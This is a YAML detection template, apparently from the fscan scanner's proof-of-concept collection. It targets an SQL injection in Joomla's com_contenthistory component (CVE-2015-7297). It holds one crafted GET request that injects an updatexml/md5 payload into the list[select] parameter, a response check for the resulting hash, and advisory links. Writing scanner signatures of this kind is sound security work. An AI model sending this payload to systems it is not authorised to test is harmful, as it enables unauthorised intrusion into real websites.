fscan/Web_Scan/pocs/joomla-cve-2015-7297-sqli.yml

10 lines
579 B
YAML

name: poc-yaml-joomla-cve-2015-7297-sqli
rules:
- method: GET
path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
detail:
links:
- https://www.exploit-db.com/exploits/38797
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/